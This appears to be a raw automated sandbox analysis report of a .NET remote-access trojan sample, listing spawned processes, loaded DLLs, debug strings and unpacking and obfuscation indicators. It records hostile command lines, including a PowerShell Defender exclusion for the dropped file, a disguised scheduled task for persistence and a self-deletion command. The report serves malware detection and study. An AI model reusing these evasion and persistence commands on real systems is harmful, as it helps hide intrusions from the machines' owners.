Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: KfYvtUBOq.exe.0.dr, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	.Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, PingPong.cs	.Net Code: Justy

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730B09D push ebp; retf	0_2_0730B09E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0730D0E8 pushfd ; ret	0_2_0730D0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD push ecx; mov dword ptr [esp], ecx	7_2_011309B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0110135E push eax; iretd	7_2_01101369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01101FEC push eax; iretd	7_2_01101FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01187E99 push ecx; ret	7_2_01187EAC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730D271 push ss; retf	8_2_0730D277
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_0730B09D push ebp; retf	8_2_0730B09E
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C70 push eax; retf	8_2_073B1C71
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073B1C90 pushad ; retf	8_2_073B1C91
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073BAB00 push eax; mov dword ptr [esp], ecx	8_2_073BAB04
Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B1E push esp; retn 0000h	9_2_0E399B1F
Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B02 push esp; retn 0000h	9_2_0E399B03
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3999B5 push esp; retn 0000h	9_2_0E399AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC9B5 push esp; retn 0000h	9_2_104FCAE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB02 push esp; retn 0000h	9_2_104FCB03
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB1E push esp; retn 0000h	9_2_104FCB1F
Source: C:\Windows\explorer.exe	Code function: 9_2_106409B5 push esp; retn 0000h	9_2_10640AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B02 push esp; retn 0000h	9_2_10640B03
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B1E push esp; retn 0000h	9_2_10640B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004172AA push ebx; ret	13_2_004172AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D4C5 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D57C push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D512 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D51B push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00416656 push ecx; retf	13_2_00416669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE push dword ptr [397EB1CEh]; ret	13_2_0041DDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121225F pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012127FA pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012409AD push ecx; mov dword ptr [esp], ecx	13_2_012409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121283D push eax; iretd	13_2_01212858

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: section name: .text entropy: 7.977493198205763
Source: KfYvtUBOq.exe.0.dr	Static PE information: section name: .text entropy: 7.977493198205763

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
